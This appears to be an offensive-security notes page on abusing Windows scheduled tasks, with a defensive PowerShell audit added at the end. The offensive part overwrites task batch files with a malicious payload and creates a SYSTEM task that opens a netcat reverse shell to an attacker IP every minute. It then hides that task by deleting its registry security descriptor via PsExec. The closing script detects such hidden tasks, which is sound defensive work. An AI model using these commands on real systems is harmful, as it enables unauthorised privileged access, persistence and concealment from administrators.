Use the built-in schtasks command to create and manipulate Windows tasks (basically the equivalent of *NIX cron jobs).

# List scheduled tasks
#
schtasks
 
# View details about a scheduled task
#
schtasks /query /tn $TASK_NAME /fo list /v
 
# Check the permissions of an executable
#
icacls $PATH_TO_BINARY
 
# Modify the permissions (if possible/desired)
#
icacls $PATH_TO_BINARY /grant $GROUP:$PERMISSION
 
# You can overwrite files in Windows in the same way you'd do
# in Linux (however, this can cause issues with line
# endings... probably best to just use notepad.exe here
# instead)
#
echo $MALICIOUS_BINARY_AND_ARGUMENTS > $PATH_TO_BAT_TO_OVERWRITE
 
# Force a task to run (only works if the current user has
# permission to do so)
#
schtasks /run /tn $TASK_NAME

If a task points to a file that you’ve obtained write access to, then that file can be altered without changing the underlying task.

It may also be possible to create your own tasks.

# Creates a task that executes a netcat reverse shell back to
# the attacker. "/sc" and "/mo" indicate that the task should
# be run every minute. "/ru" indicates that the task will run
# with SYSTEM privileges.
#
schtasks /create /sc minute /mo 1 /tn $TASK_NAME `
	/tr "$NETCAT_PATH -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" `
	/ru SYSTEM
 
# Checks to see if the task was created successfully.
#
schtasks /query /tn $TASK_NAME

Stealthy tasks

How to hide Windows tasks using PsExec

Deleting the task's Security Descriptor (the SD value stored in the registry) will make the task invisible to any user on the system: it no longer shows up in schtasks or in the Task Scheduler UI. Note that this requires PsExec, since regedit has to be running as SYSTEM to edit the TaskCache keys!

  1. Use PsExec64.exe -s -i regedit to open regedit with SYSTEM privileges.

  2. Search in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ for the task to hide. Under the key for that task, there will be a value named SD that contains the security descriptor. Simply delete it.
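From the defender's side, the same registry location is where a hidden task can be found again. The following PowerShell audit is an added example, not part of the original page: it walks TaskCache\Tree, flags task keys whose SD value is missing, and cross-checks each one against what Get-ScheduledTask is willing to report. It assumes an elevated PowerShell session (reading TaskCache requires administrative rights) and the ScheduledTasks module (Windows 8 / Server 2012 and later). The function name Find-HiddenScheduledTask is mine.

```powershell
# Added example (not from the original page): audit the Task Scheduler cache for
# task entries whose SD (security descriptor) value has been removed, which is
# how the technique above hides a task from schtasks and the Task Scheduler UI.
# Assumes an elevated session and the ScheduledTasks module.

function Find-HiddenScheduledTask {
    $treeRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'

    # What the scheduler API is willing to show; SD-less tasks never appear here.
    $visible = @{}
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        $visible["$($_.TaskPath)$($_.TaskName)"] = $true
    }

    # Every registered task is a leaf key under Tree (task folders are keys too,
    # but only task keys carry an Id value). A healthy task key also carries SD.
    Get-ChildItem -Path $treeRoot -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $null -ne $_.GetValue('Id') } |
        ForEach-Object {
            # Turn the registry path back into the scheduler path, e.g.
            # ...\Tree\Microsoft\Windows\Foo  ->  \Microsoft\Windows\Foo
            $taskPath = $_.Name.Substring($_.Name.IndexOf('\Tree\') + 5)
            $hasSd    = $null -ne $_.GetValue('SD')

            [pscustomobject]@{
                TaskPath   = $taskPath
                Id         = $_.GetValue('Id')
                HasSD      = $hasSd
                Visible    = $visible.ContainsKey($taskPath)
                # Either condition alone deserves a look; both together match
                # the hiding technique described on this page.
                Suspicious = (-not $hasSd) -or (-not $visible.ContainsKey($taskPath))
            }
        }
}

# Print only the entries that need attention.
Find-HiddenScheduledTask | Where-Object Suspicious | Format-Table -AutoSize
```

A task that is in the registry but absent from Get-ScheduledTask is worth pulling the matching TaskCache\Tasks\{Id} key for (its Path, Author and Actions values) before deciding whether to remove it.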
